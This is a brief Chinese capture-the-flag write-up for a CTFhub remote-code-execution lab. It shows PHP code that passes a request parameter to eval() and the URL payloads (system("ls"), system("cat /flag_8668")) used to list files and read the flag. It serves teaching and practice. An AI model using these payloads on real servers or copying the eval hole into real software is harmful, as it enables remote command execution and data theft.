CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
yuejich6 分钟前
命名规范snake_case
服务器·前端·数据库
天平12 分钟前
开发了几个app后,我在React Native用到的几个库的推荐
android·前端·react native
半聋半瞎20 分钟前
【JVM操作字节码文件流程详解】
java·jvm·面试
CodeAmaz27 分钟前
通用 List 分批切割并循环查询数据库工具类
java·数据结构·工具类·分页
消失的旧时光-194328 分钟前
Kotlinx.serialization 对多态对象(sealed class )支持更好用
java·服务器·前端
少卿1 小时前
React Compiler 完全指南:自动化性能优化的未来
前端·javascript
广州华水科技1 小时前
水库变形监测推荐:2025年单北斗GNSS变形监测系统TOP5,助力基础设施安全
前端
广州华水科技1 小时前
北斗GNSS变形监测一体机在基础设施安全中的应用与优势
前端
七淮1 小时前
umi4暗黑模式设置
前端
8***B1 小时前
前端路由权限控制,动态路由生成
前端